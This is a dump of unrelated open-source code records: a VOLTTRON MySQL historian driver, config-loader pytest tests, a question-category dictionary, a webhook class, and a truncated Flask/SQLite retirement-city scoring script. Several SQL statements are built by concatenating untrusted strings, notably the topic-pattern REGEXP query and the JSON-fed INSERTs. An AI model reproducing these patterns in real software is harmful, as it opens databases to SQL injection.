SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n# The views and conclusions contained in the software and documentation\n# are those of the authors and should not be interpreted as representing\n# official policies, either expressed or implied, of the FreeBSD\n# Project.\n#\n# This material was prepared as an account of work sponsored by an\n# agency of the United States Government. Neither the United States\n# Government nor the United States Department of Energy, nor Battelle,\n# nor any of their employees, nor any jurisdiction or organization that\n# has cooperated in the development of these materials, makes any\n# warranty, express or implied, or assumes any legal liability or\n# responsibility for the accuracy, completeness, or usefulness or any\n# information, apparatus, product, software, or process disclosed, or\n# represents that its use would not infringe privately owned rights.\n#\n# Reference herein to any specific commercial product, process, or\n# service by trade name, trademark, manufacturer, or otherwise does not\n# necessarily constitute or imply its endorsement, recommendation, or\n# favoring by the United States Government or any agency thereof, or\n# Battelle Memorial Institute. 
The views and opinions of authors\n# expressed herein do not necessarily state or reflect those of the\n# United States Government or any agency thereof.\n#\n# PACIFIC NORTHWEST NATIONAL LABORATORY\n# operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY\n# under Contract DE-AC05-76RL01830\n# }}}\nimport ast\nimport logging\nfrom collections import defaultdict\n\nimport pytz\nimport re\nfrom basedb import DbDriver\nfrom mysql.connector import Error as MysqlError\nfrom mysql.connector import errorcode as mysql_errorcodes\nfrom volttron.platform.agent import utils\nfrom volttron.platform.agent import json as jsonapi\n\nutils.setup_logging()\n_log = logging.getLogger(__name__)\n\n\"\"\"\nImplementation of Mysql database operation for\n:py:class:`sqlhistorian.historian.SQLHistorian` and\n:py:class:`sqlaggregator.aggregator.SQLAggregateHistorian`\nFor method details please refer to base class\n:py:class:`volttron.platform.dbutils.basedb.DbDriver`\n\"\"\"\nclass MySqlFuncts(DbDriver):\n def __init__(self, connect_params, table_names):\n # kwargs['dbapimodule'] = 'mysql.connector'\n self.MICROSECOND_SUPPORT = None\n\n self.data_table = None\n self.topics_table = None\n self.meta_table = None\n self.agg_topics_table = None\n self.agg_meta_table = None\n\n if table_names:\n self.data_table = table_names['data_table']\n self.topics_table = table_names['topics_table']\n self.meta_table = table_names['meta_table']\n self.agg_topics_table = table_names.get('agg_topics_table', None)\n self.agg_meta_table = table_names.get('agg_meta_table', None)\n # This is needed when reusing the same connection. Else cursor returns\n # cached data even if we create a new cursor for each query and\n # close the cursor after fetching results\n connect_params['autocommit'] = True\n super(MySqlFuncts, self).__init__('mysql.connector', **connect_params)\n\n def init_microsecond_support(self):\n rows = self.select(\"SELECT version()\", None)\n p = re.compile('(\\d+)\\D+(\\d+)\\D+(\\d+)\\D*')\n version_nums = p.match(rows[0][0]).groups()\n if int(version_nums[0]) < 5:\n self.MICROSECOND_SUPPORT = False\n elif int(version_nums[1]) < 6:\n self.MICROSECOND_SUPPORT = False\n elif int(version_nums[2]) < 4:\n self.MICROSECOND_SUPPORT = False\n else:\n self.MICROSECOND_SUPPORT = True\n\n def setup_historian_tables(self):\n if self.MICROSECOND_SUPPORT is None:\n self.init_microsecond_support()\n\n rows = self.select(\"show tables like %s\", [self.data_table])\n if rows:\n _log.debug(\"Found table {}. 
Historian table exists\".format(\n self.data_table))\n return\n\n try:\n if self.MICROSECOND_SUPPORT:\n self.execute_stmt(\n 'CREATE TABLE IF NOT EXISTS ' + self.data_table +\n ' (ts timestamp(6) NOT NULL,\\\n topic_id INTEGER NOT NULL, \\\n value_string TEXT NOT NULL, \\\n UNIQUE(topic_id, ts))')\n else:\n self.execute_stmt(\n 'CREATE TABLE IF NOT EXISTS ' + self.data_table +\n ' (ts timestamp NOT NULL,\\\n topic_id INTEGER NOT NULL, \\\n value_string TEXT NOT NULL, \\\n UNIQUE(topic_id, ts))')\n\n self.execute_stmt('''CREATE INDEX data_idx\n ON ''' + self.data_table + ''' (ts ASC)''')\n self.execute_stmt('''CREATE TABLE IF NOT EXISTS ''' +\n self.topics_table +\n ''' (topic_id INTEGER NOT NULL AUTO_INCREMENT,\n topic_name varchar(512) NOT NULL,\n PRIMARY KEY (topic_id),\n UNIQUE(topic_name))''')\n self.execute_stmt('''CREATE TABLE IF NOT EXISTS '''\n + self.meta_table +\n '''(topic_id INTEGER NOT NULL,\n metadata TEXT NOT NULL,\n PRIMARY KEY(topic_id))''')\n self.commit()\n _log.debug(\"Created data topics and meta tables\")\n except MysqlError as err:\n err_msg = \"Error creating \" \\\n \"historian tables as the configured user. \" \\\n \"Please create the tables manually before \" \\\n \"restarting historian. Please refer to \" \\\n \"mysql-create*.sql files for create \" \\\n \"statements\"\n if err.errno == mysql_errorcodes.ER_TABLEACCESS_DENIED_ERROR:\n err_msg = \"Access denied : \" + err_msg\n else:\n err_msg = err.msg + \" : \" + err_msg\n raise RuntimeError(err_msg)\n\n def record_table_definitions(self, tables_def, meta_table_name):\n _log.debug(\n \"In record_table_def {} {}\".format(tables_def, meta_table_name))\n self.execute_stmt(\n 'CREATE TABLE IF NOT EXISTS ' + meta_table_name +\n ' (table_id varchar(512) PRIMARY KEY, \\\n table_name varchar(512) NOT NULL, \\\n table_prefix varchar(512));')\n\n table_prefix = tables_def.get('table_prefix', \"\")\n\n insert_stmt = 'REPLACE INTO ' + meta_table_name + \\\n ' VALUES (%s, %s, %s)'\n self.execute_stmt(insert_stmt,\n ('data_table', tables_def['data_table'],\n table_prefix))\n self.execute_stmt(insert_stmt,\n ('topics_table', tables_def['topics_table'],\n table_prefix))\n self.execute_stmt(\n insert_stmt,\n ('meta_table', tables_def['meta_table'], table_prefix),\n commit=True)\n\n def setup_aggregate_historian_tables(self, meta_table_name):\n _log.debug(\"CREATING AGG TABLES\")\n table_names = self.read_tablenames_from_db(meta_table_name)\n\n self.data_table = table_names['data_table']\n self.topics_table = table_names['topics_table']\n _log.debug(\"In setup_aggregate_historian self.topics_table\"\n \" {}\".format(self.topics_table))\n self.meta_table = table_names['meta_table']\n self.agg_topics_table = table_names.get('agg_topics_table', None)\n self.agg_meta_table = table_names.get('agg_meta_table', None)\n\n self.execute_stmt(\n 'CREATE TABLE IF NOT EXISTS ' + self.agg_topics_table +\n ' (agg_topic_id INTEGER NOT NULL AUTO_INCREMENT, \\\n agg_topic_name varchar(512) NOT NULL, \\\n agg_type varchar(512) NOT NULL, \\\n agg_time_period varchar(512) NOT NULL, \\\n PRIMARY KEY (agg_topic_id), \\\n UNIQUE(agg_topic_name, agg_type, agg_time_period));')\n\n self.execute_stmt(\n 'CREATE TABLE IF NOT EXISTS ' + self.agg_meta_table +\n '(agg_topic_id INTEGER NOT NULL, \\\n metadata TEXT NOT NULL, \\\n PRIMARY KEY(agg_topic_id));')\n self.commit()\n _log.debug(\"Created aggregate topics and meta tables\")\n\n def query(self, topic_ids, id_name_map, start=None, end=None, skip=0,\n agg_type=None, agg_period=None, count=None,\n 
order=\"FIRST_TO_LAST\"):\n\n table_name = self.data_table\n if agg_type and agg_period:\n table_name = agg_type + \"_\" + agg_period\n\n query = '''SELECT topic_id, ts, value_string\n FROM ''' + table_name + '''\n {where}\n {order_by}\n {limit}\n {offset}'''\n\n if self.MICROSECOND_SUPPORT is None:\n self.init_microsecond_support()\n\n where_clauses = [\"WHERE topic_id = %s\"]\n args = [topic_ids[0]]\n\n if start is not None:\n if start.tzinfo != pytz.UTC:\n start = start.astimezone(pytz.UTC)\n if not self.MICROSECOND_SUPPORT:\n start_str = start.isoformat()\n start = start_str[:start_str.rfind('.')]\n\n if end is not None:\n if end.tzinfo !=pytz.UTC:\n end = end.astimezone(pytz.UTC)\n if not self.MICROSECOND_SUPPORT:\n end_str = end.isoformat()\n end = end_str[:end_str.rfind('.')]\n\n if start and end and start == end:\n where_clauses.append(\"ts = %s\")\n args.append(start)\n else:\n if start:\n where_clauses.append(\"ts >= %s\")\n args.append(start)\n if end:\n where_clauses.append(\"ts < %s\")\n args.append(end)\n\n where_statement = ' AND '.join(where_clauses)\n\n order_by = 'ORDER BY ts ASC'\n if order == 'LAST_TO_FIRST':\n order_by = ' ORDER BY topic_id DESC, ts DESC'\n\n # can't have an offset without a limit\n # -1 = no limit and allows the user to\n # provide just an offset\n if count is None:\n count = 100\n\n limit_statement = 'LIMIT %s'\n args.append(int(count))\n\n offset_statement = ''\n if skip > 0:\n offset_statement = 'OFFSET %s'\n args.append(skip)\n\n _log.debug(\"About to do real_query\")\n values = defaultdict(list)\n for topic_id in topic_ids:\n args[0] = topic_id\n values[id_name_map[topic_id]] = []\n real_query = query.format(where=where_statement,\n limit=limit_statement,\n offset=offset_statement,\n order_by=order_by)\n _log.debug(\"Real Query: \" + real_query)\n _log.debug(\"args: \" + str(args))\n\n cursor = self.select(real_query, args, fetch_all=False)\n if cursor:\n for _id, ts, value in cursor:\n values[id_name_map[topic_id]].append(\n (utils.format_timestamp(ts.replace(tzinfo=pytz.UTC)),\n jsonapi.loads(value)))\n cursor.close()\n return values\n\n def insert_meta_query(self):\n return '''REPLACE INTO ''' + self.meta_table + ''' values(%s, %s)'''\n\n def insert_data_query(self):\n return '''REPLACE INTO ''' + self.data_table + \\\n ''' values(%s, %s, %s)'''\n\n def insert_topic_query(self):\n _log.debug(\"In insert_topic_query - self.topic_table \"\n \"{}\".format(self.topics_table))\n return '''INSERT INTO ''' + self.topics_table + ''' (topic_name)\n values (%s)'''\n\n def update_topic_query(self):\n return '''UPDATE ''' + self.topics_table + ''' SET topic_name = %s\n WHERE topic_id = %s'''\n\n def get_aggregation_list(self):\n return ['AVG', 'MIN', 'MAX', 'COUNT', 'SUM', 'BIT_AND', 'BIT_OR',\n 'BIT_XOR', 'GROUP_CONCAT', 'STD', 'STDDEV', 'STDDEV_POP',\n 'STDDEV_SAMP', 'VAR_POP', 'VAR_SAMP', 'VARIANCE']\n\n def insert_agg_topic_stmt(self):\n _log.debug(\"Insert aggregate topics stmt inserts \"\n \"into {}\".format(self.agg_topics_table))\n return '''INSERT INTO ''' + self.agg_topics_table + '''\n (agg_topic_name, agg_type, agg_time_period )\n values (%s, %s, %s)'''\n\n def update_agg_topic_stmt(self):\n return '''UPDATE ''' + self.agg_topics_table + ''' SET\n agg_topic_name = %s WHERE agg_topic_id = %s '''\n\n def replace_agg_meta_stmt(self):\n return '''REPLACE INTO ''' + self.agg_meta_table + ''' values(%s,\n %s)'''\n\n def get_topic_map(self):\n q = \"SELECT topic_id, topic_name FROM \" + self.topics_table + \";\"\n rows = self.select(q, None)\n 
_log.debug(\"loading topic map from db\")\n id_map = dict()\n name_map = dict()\n for t, n in rows:\n id_map[n.lower()] = t\n name_map[n.lower()] = n\n _log.debug(id_map)\n _log.debug(name_map)\n return id_map, name_map\n\n def get_agg_topics(self):\n _log.debug(\"in get_agg_topics\")\n try:\n query = \"SELECT agg_topic_name, agg_type, agg_time_period, \" \\\n \"metadata FROM \" + self.agg_topics_table + \" as t, \" + \\\n self.agg_meta_table + \" as m WHERE t.agg_topic_id = \" \\\n \"m.agg_topic_id \"\n rows = self.select(query, None)\n topics = []\n for row in rows:\n meta = ast.literal_eval(row[3])['configured_topics']\n topics.append((row[0], row[1], row[2], meta))\n return topics\n except MysqlError as e:\n if e.errno == mysql_errorcodes.ER_NO_SUCH_TABLE:\n return []\n else:\n raise\n\n def get_agg_topic_map(self):\n _log.debug(\"in get_agg_topic_map\")\n try:\n q = \"SELECT agg_topic_id, agg_topic_name, agg_type, \" \\\n \"agg_time_period \" \\\n \"FROM \" + self.agg_topics_table\n rows = self.select(q, None)\n _log.debug(\"loading agg_topic map from db\")\n id_map = dict()\n for row in rows:\n _log.debug(\"rows from aggregate_topics {}\".format(row))\n id_map[(row[1].lower(), row[2], row[3])] = row[0]\n return id_map\n except MysqlError as e:\n if e.errno == mysql_errorcodes.ER_NO_SUCH_TABLE:\n return {}\n else:\n raise\n\n def query_topics_by_pattern(self, topic_pattern):\n q = \"SELECT topic_id, topic_name FROM \" + self.topics_table + \\\n \" WHERE lower(topic_name) REGEXP lower('\" + topic_pattern + \"');\"\n\n rows = self.select(q, None)\n _log.debug(\"loading topic map from db\")\n id_map = dict()\n for t, n in rows:\n id_map[n] = t\n _log.debug(\"topics that matched the pattern {} : {}\".format(\n topic_pattern, id_map))\n return id_map\n\n def create_aggregate_store(self, agg_type, agg_time_period):\n table_name = agg_type + '''_''' + agg_time_period\n if self.MICROSECOND_SUPPORT is None:\n self.init_microsecond_support()\n\n stmt = \"CREATE TABLE IF NOT EXISTS \" + table_name + \\\n \" (ts timestamp(6) NOT NULL, topic_id INTEGER NOT NULL, \" \\\n \"value_string TEXT NOT NULL, topics_list TEXT,\" \\\n \" UNIQUE(topic_id, ts),\" \\\n \"INDEX (ts ASC))\"\n if not self.MICROSECOND_SUPPORT:\n stmt = \"CREATE TABLE IF NOT EXISTS \" + table_name + \\\n \" (ts timestamp NOT NULL, topic_id INTEGER NOT NULL, \" \\\n \"value_string TEXT NOT NULL, topics_list TEXT,\" \\\n \" UNIQUE(topic_id, ts),\" \\\n \"INDEX (ts ASC))\"\n return self.execute_stmt(stmt, commit=True)\n\n def insert_aggregate_stmt(self, table_name):\n return '''REPLACE INTO ''' + table_name + \\\n ''' values(%s, %s, %s, %s)'''\n\n def collect_aggregate(self, topic_ids, agg_type, start=None, end=None):\n if isinstance(agg_type, str):\n if agg_type.upper() not in ['AVG', 'MIN', 'MAX', 'COUNT', 'SUM']:\n raise ValueError(\n \"Invalid aggregation type {}\".format(agg_type))\n query = '''SELECT ''' \\\n + agg_type + '''(value_string), count(value_string) FROM ''' \\\n + self.data_table + ''' {where}'''\n where_clauses = [\"WHERE topic_id = %s\"]\n args = [topic_ids[0]]\n if len(topic_ids) > 1:\n where_str = \"WHERE topic_id IN (\"\n for _ in topic_ids:\n where_str += \"%s, \"\n where_str = where_str[:-2] # strip last comma and space\n where_str += \") \"\n where_clauses = [where_str]\n args = topic_ids[:]\n\n if start is not None:\n where_clauses.append(\"ts >= %s\")\n if self.MICROSECOND_SUPPORT:\n args.append(start)\n else:\n start_str = start.isoformat()\n args.append(start_str[:start_str.rfind('.')])\n\n if end is not 
None:\n where_clauses.append(\"ts < %s\")\n if self.MICROSECOND_SUPPORT:\n args.append(end)\n else:\n end_str = end.isoformat()\n args.append(end_str[:end_str.rfind('.')])\n\n where_statement = ' AND '.join(where_clauses)\n\n real_query = query.format(where=where_statement)\n _log.debug(\"Real Query: \" + real_query)\n _log.debug(\"args: \" + str(args))\n\n rows = self.select(real_query, args)\n if rows:\n return rows[0][0], rows[0][1]\n else:\n return 0, 0\n","sub_path":"volttron/platform/dbutils/mysqlfuncts.py","file_name":"mysqlfuncts.py","file_ext":"py","file_size_in_byte":19599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"47642394","text":"question_category = {'what': 'what',\n #'where': 'where', as it is handled by map\n 'why': 'why',\n 'who': 'who',\n 'when' : 'when',\n 'how many': 'quantity',\n 'how much': 'quantity',\n 'are': 'boolean',\n 'can': 'boolean',\n 'will': 'boolean',\n }\n\n# keeping it separate to prioritize questions\nquestion_markers = ['what', 'when',\n #'where', as it is handled by map\n 'why', 'who', 'how many', 'how much', 'will', 'can', 'are']","sub_path":"core/understander/business/general/question_category_dict.py","file_name":"question_category_dict.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"449440434","text":"import inspect\nimport os\nimport pytest\nimport multiprocessing as mp\nfrom pathlib import Path\n\nfrom py_config_runner import ConfigObject, load_module\n\n\ndef test_config_object(config_filepath):\n\n config = ConfigObject(config_filepath)\n assert \"a\" in config\n assert config[\"a\"] == config.a == config.get(\"a\") == 1\n assert \"b\" in config\n assert config[\"b\"] == config.b == config.get(\"b\") == 2\n assert config[\"_data\"] == config._data == config.get(\"_data\") == 3\n\n config.c = 3\n config[\"d\"] = 4\n\n assert \"c\" in config\n assert config[\"c\"] == config.c == config.get(\"c\") == 3\n assert config[\"d\"] == config.d == config.get(\"d\") == 4\n assert \"config_filepath\" in config\n assert isinstance(config.config_filepath, Path)\n assert config.config_filepath == config_filepath\n assert config[\"config_filepath\"] == config_filepath\n assert config.get(\"config_filepath\") == config_filepath\n\n for k in config:\n assert not k.startswith(\"__\")\n\n def foo(**kwargs):\n for k in [\"a\", \"b\", \"c\", \"d\", \"config_filepath\"]:\n assert k in kwargs\n\n foo(**config)\n\n for k, v in config.__dict__.items():\n assert not inspect.ismodule(v)\n\n\ndef test_config_object_length(config_filepath):\n config = ConfigObject(config_filepath)\n\n assert len(config) == 4 + 1 # config + config_filepath\n\n\ndef test_config_object_items(config_filepath):\n config = ConfigObject(config_filepath)\n\n res = [(k, v) for k, v in config.items()]\n assert len(res) == 4 + 1 # config + config_filepath\n\n\ndef test_config_object_loading(config_filepath):\n config = ConfigObject(config_filepath)\n\n def foo(**kwargs):\n for k in [\"a\", \"b\", \"config_filepath\"]:\n assert k in kwargs\n\n foo(**config)\n\n\ndef test_config_object_repr(config_filepath):\n config = ConfigObject(config_filepath)\n\n out = repr(config)\n assert \"a\" in out\n assert \"b\" in out\n assert \"data\" in out\n assert \"_data\" in out\n\n\ndef test_config_object_init_kwargs(config_filepath):\n # Pass a as kwargs\n config = ConfigObject(config_filepath, a=10, another_data=123)\n # assert that a is overriden by 
config_filepath\n assert config.a == 1\n assert config.another_data == 123\n\n\ndef test_config_object_lazy_load(dirname):\n filepath = dirname / \"bad_config.py\"\n\n s = \"\"\"\na = 123\n\nraise RuntimeError(\"error\")\n \"\"\"\n\n with filepath.open(\"w\") as h:\n h.write(s)\n\n config = ConfigObject(filepath)\n\n with pytest.raises(RuntimeError, match=r\"error\"):\n assert config.a == 123\n\n\ndef test_config_object_mutations(dirname):\n filepath = dirname / \"custom_module.py\"\n\n s = \"\"\"\n\na = 123\nb = 12.3\nc = \"abc\"\nd = True\n# e = None\n\n\ndef func(x):\n return x + a\n\nout = func(10)\n\ndef func2(x):\n return x + b\n\nout2 = func2(1.0)\n\n\ndef func3(x):\n if x == \"abc\":\n return 1.0\n elif x == \"cba\":\n return -1.0\n else:\n return 0.0\n\nout3 = func3(c)\n\n\nout4 = 10 if d else -10\n# out5 = 10 if e is None else -10\n \"\"\"\n\n with filepath.open(\"w\") as h:\n h.write(s)\n\n config = ConfigObject(filepath, mutations={\"a\": 333, \"b\": 22.0, \"c\": \"cba\", \"d\": False})\n\n assert config.a == 333\n assert config.out == 10 + 333\n assert config.b == 22.0\n assert config.out2 == 1.0 + 22.0\n assert config.c == \"cba\"\n assert config.out3 == -1.0\n assert not config.d\n assert config.out4 == -10\n\n\n@pytest.mark.parametrize(\n \"old_value\",\n [{\"encoder\": \"E1\", \"decoder\": \"D1\"}, \"unet\", [1, 2, 3], 5],\n)\n@pytest.mark.parametrize(\n \"new_value\",\n [\"unet\", [1, 2, 3], {\"encoder\": \"E1\", \"decoder\": \"D1\"}, 5],\n)\ndef test_config_object_mutations_nonconst(old_value, new_value, dirname):\n filepath = dirname / \"custom_module.py\"\n\n s = f\"\"\"\n\na = {old_value}\n\n \"\"\"\n\n with filepath.open(\"w\") as h:\n h.write(s)\n\n config = ConfigObject(filepath, mutations={\"a\": new_value})\n\n assert config.a == new_value\n\n\ndef test_config_object_mutations_assert(config_filepath):\n with pytest.raises(TypeError, match=r\"Argument mutations should be a mapping\"):\n ConfigObject(config_filepath, mutations=\"abc\")\n\n class A:\n pass\n\n with pytest.raises(ValueError, match=r\"Failed to create value's AST\"):\n ConfigObject(config_filepath, mutations={\"a\": A()})\n\n\n@pytest.mark.parametrize(\"mutations\", [None, {\"a\": [1, 2, 3]}])\ndef test_config_object_no_modules(mutations, config_filepath2):\n\n import numpy as np\n\n config = ConfigObject(config_filepath2, mutations=mutations)\n\n for k, v in config.items():\n assert not inspect.ismodule(v), f\"{k}: {v}\"\n\n assert \"a\" in config\n assert config.a == 1 if mutations is None else [1, 2, 3]\n assert \"arr\" in config\n np.testing.assert_allclose(config.arr, np.array([1, 2, 3]))\n assert \"out\" in config\n assert config.out == 12\n\n\ndef test_config_object_mutations_validate(dirname):\n filepath = dirname / \"custom_module.py\"\n\n s = \"\"\"\n\na = 123\n\ndef func(x):\n return x + a\n\nout = func(10)\n \"\"\"\n\n with filepath.open(\"w\") as h:\n h.write(s)\n\n config = ConfigObject(filepath, mutations={\"a\": 333, \"b\": 22.0})\n\n with pytest.raises(RuntimeError, match=r\"Following mutations were not applied\"):\n assert config.a == 333\n\n\ndef test_load_module(dirname):\n import numpy as np\n\n filepath = dirname / \"custom_module.py\"\n\n s = \"\"\"\nimport numpy as np\na = 123\nb = np.array([1, 2, 3])\n \"\"\"\n\n with filepath.open(\"w\") as h:\n h.write(s)\n\n custom_module = load_module(filepath)\n\n assert \"a\" in custom_module.__dict__\n assert custom_module.a == 123\n\n assert \"b\" in custom_module.__dict__\n np.testing.assert_allclose(custom_module.b, np.array([1, 2, 
3]))\n\n\ndef test_load_module_wrong_args():\n with pytest.raises(ValueError, match=r\"is not found\"):\n load_module(\"/tmp/abcdef\")\n\n with pytest.raises(ValueError, match=r\"should be a file\"):\n load_module(\"/tmp/\")\n\n\ndef worker_function(config):\n pass\n\n\n@pytest.mark.parametrize(\"method\", [\"fork\", \"spawn\"])\ndef test_mp_config(method, config_filepath):\n\n config = ConfigObject(config_filepath)\n ctx = mp.get_context(method)\n p = ctx.Process(target=worker_function, args=(config,))\n p.start()\n p.join()\n\n\ndef worker_config_checker(config):\n import numpy as np\n\n assert \"a\" in config\n assert config.a == 123\n\n assert \"b\" in config\n np.testing.assert_allclose(config.b, np.array([1, 2, 3]))\n\n assert \"out\" in config\n assert config.out == 12\n\n\n@pytest.mark.parametrize(\"method\", [\"fork\", \"spawn\"])\ndef test_mp_config2(method, config_filepath2):\n\n config = ConfigObject(config_filepath2)\n ctx = mp.get_context(method)\n p = ctx.Process(target=worker_config_checker, args=(config,))\n p.start()\n p.join()\n","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":6758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"584263347","text":"from .models import Model\n\n\nclass Webhook(Model):\n\n @classmethod\n def parse(cls, api, json):\n webhook = cls(api)\n setattr(webhook, '_json', json)\n\n for k, v in json.items():\n setattr(webhook, k, v)\n\n return webhook\n","sub_path":"cogs/twitcasting/pytwitcast/webhook.py","file_name":"webhook.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"379420103","text":"from flask import Flask, render_template, jsonify, redirect\r\nfrom flask import jsonify\r\nimport csv\r\nimport json\r\nimport sqlite3 as sql\r\nimport pandas as pd \r\n# from __future__ import print_function\r\nimport sys\r\nimport time\r\n\r\n\r\napp = Flask(__name__)\r\napp.debug=True\r\n\r\n\r\ndef scoredata(uPopulation,uOver_65,uRent,uHome_Price,uAssistance,wPopulation,wOver_65,wRent,wHome_Price,wAssistance):\r\n# def scoredata():\r\n import json\r\n import sqlite3 as sql\r\n import numpy as np\r\n import pandas as pd \r\n\r\n conn = sql.connect(\"./Datasets/RetirementDB.sqlite\")\r\n\r\n c = conn.cursor()\r\n\r\n conn.execute(\"DELETE from CityProfile\")\r\n conn.commit()\r\n\r\n data = []\r\n with open('./retiredb.json') as f:\r\n data=list(json.load(f).items())\r\n\r\n for row in data: \r\n query = \"insert into CityProfile values (\"+\\\r\n \"'\"+row[1][\"City\"]+\"',\"+\\\r\n \"'\"+row[1][\"State\"]+\"',\"+\\\r\n \"'\"+row[1][\"Zipcode\"]+\"',\"+\\\r\n str(row[1][\"Rank\"])+\",\"+\\\r\n str(row[1][\"Population\"])+\",\"+\\\r\n str(row[1][\"Over_65\"])+\",\"+\\\r\n str(row[1][\"Rent\"])+\",\"+\\\r\n str(row[1][\"Home_Price\"])+\",\"+\\\r\n str(row[1][\"Assistance\"])+\",\"+\\\r\n str(row[1][\"Latitude\"])+\",\"+\\\r\n str(row[1][\"Longitude\"])+\",\"+\\\r\n \"'\"+row[1][\"URL\"]+\"')\"\r\n print(query)\r\n c.execute(query)\r\n conn.commit()\r\n\r\n ## Calculate Score\r\n import math\r\n\r\n print(\"Running actual engine using input:\")\r\n print(uPopulation)\r\n print(uOver_65)\r\n print(uRent)\r\n print(uHome_Price)\r\n print(uAssistance)\r\n\r\n print(wPopulation)\r\n print(wOver_65)\r\n print(wRent)\r\n print(wHome_Price)\r\n print(wAssistance)\r\n\r\n\r\n #1 Get Standardized Value\r\n #1.1 Calc Mean\r\n citylist=conn.execute(\"SELECT count(*) 
cntRow,avg(Population) avgPopulation,avg(Over_65) avgOver_65,avg(Rent) avgRent,avg(Home_Price) avgHome_Price,avg(Assistance) avgAssistance from CityProfile\")\r\n for avgrow in citylist:\r\n avgrow[0] \r\n\r\n RowCount=avgrow[0] \r\n meanPopulation=avgrow[1]\r\n meanOver_65=avgrow[2]\r\n meanRent=avgrow[3]\r\n meanHome_Price=avgrow[4]\r\n meanAssistance=avgrow[5]\r\n\r\n\r\n #1.2 Calc Standard Dev\r\n citylist=conn.execute(\"SELECT 1, Population,Over_65,Rent,Home_Price,Assistance from CityProfile\")\r\n rPopulation=0\r\n rOver_65=0\r\n rRent=0\r\n rHome_Price=0\r\n rAssistance=0\r\n for row in citylist:\r\n rPopulation=rPopulation+(row[1]-meanPopulation)**2\r\n rOver_65=rOver_65+(row[2]-meanOver_65)**2\r\n rRent=rRent+(row[3]-meanRent)**2\r\n rHome_Price=rHome_Price+(row[4]-meanHome_Price)**2\r\n rAssistance=rAssistance+(row[5]-meanAssistance)**2\r\n\r\n stdvPopulation=math.sqrt(rPopulation/RowCount)\r\n stdvOver_65=math.sqrt(rOver_65/RowCount)\r\n stdvRent=math.sqrt(rRent/RowCount)\r\n stdvHome_Price=math.sqrt(rHome_Price/RowCount)\r\n stdvAssistance=math.sqrt(rAssistance/RowCount)\r\n \r\n # 2 Apply Euclidean/Mahalanobis Distance Measure \r\n print(\"Starting Euclid\")\r\n print(uPopulation)\r\n print(meanPopulation)\r\n print(stdvPopulation)\r\n zuPopulation=(uPopulation-meanPopulation)/stdvPopulation\r\n zuOver_65=(uOver_65-meanOver_65)/stdvOver_65\r\n zuRent=(uRent-meanRent)/stdvRent\r\n zuHome_Price=(uHome_Price-meanHome_Price)/stdvHome_Price\r\n zuAssistance=(uAssistance-meanAssistance)/stdvAssistance\r\n print(\"Completed first part\")\r\n\r\n cityscore=[]\r\n citylist=conn.execute(\"SELECT 1, Population,Over_65,Rent,Home_Price,Assistance,City, State, \\\r\n Latitude,Longitude,URL,ZipCode,USNewsRank from CityProfile\")\r\n for row in citylist:\r\n\r\n cPopulation=row[1]\r\n cOver_65=row[2]\r\n cRent=row[3]\r\n cHome_Price=row[4]\r\n cAssistance=row[5]\r\n\r\n \r\n zcPopulation=(cPopulation-meanPopulation)/stdvPopulation\r\n zcOver_65=(cOver_65-meanOver_65)/stdvOver_65\r\n zcRent=(cRent-meanRent)/stdvRent\r\n zcHome_Price=(cHome_Price-meanHome_Price)/stdvHome_Price\r\n zcAssistance=(cAssistance-meanAssistance)/stdvAssistance\r\n \r\n # Cal Distance Score\r\n \r\n score=math.sqrt(((zuPopulation-zcPopulation)*wPopulation)**2+ \\\r\n ((zuOver_65-zcOver_65)*wOver_65)**2+ \\\r\n ((zuRent-zcRent)*wRent)**2+ \\\r\n ((zuHome_Price-zcHome_Price)*wHome_Price)**2+ \\\r\n ((zuAssistance-zcAssistance)*wAssistance)**2 \\\r\n )\r\n print(\"Score: \"+row[6]+\" \"+row[7]+\" \"+str(score))\r\n\r\n cityscore.append((row[6],row[7],row[8],row[9],row[10], \\\r\n uPopulation,uOver_65,uRent,uHome_Price,uAssistance, \\\r\n zuPopulation,zuOver_65,zuRent,zuHome_Price,zuAssistance, \\\r\n cPopulation,cOver_65,cRent,cHome_Price,cAssistance, \\\r\n zcPopulation,zcOver_65,zcRent,zcHome_Price,zcAssistance, \\\r\n score,row[11],row[12]))\r\n\r\n conn.execute(\"DELETE from CityProfileScored\")\r\n conn.commit()\r\n \r\n for row in cityscore:\r\n query = \"insert into CityProfileScored values (\"+\\\r\n \"'\"+row[0]+\"',\"+\\\r\n \"'\"+row[1]+\"',\"+\\\r\n str(row[2])+\",\"+\\\r\n str(row[3])+\",\"+\\\r\n \"'\"+row[4]+\"',\"+\\\r\n str(row[5])+\",\"+\\\r\n str(row[6])+\",\"+\\\r\n str(row[7])+\",\"+\\\r\n str(row[8])+\",\"+\\\r\n str(row[9])+\",\"+\\\r\n str(row[10])+\",\"+\\\r\n str(row[11])+\",\"+\\\r\n str(row[12])+\",\"+\\\r\n str(row[13])+\",\"+\\\r\n str(row[14])+\",\"+\\\r\n str(row[15])+\",\"+\\\r\n str(row[16])+\",\"+\\\r\n str(row[17])+\",\"+\\\r\n str(row[18])+\",\"+\\\r\n str(row[19])+\",\"+\\\r\n 
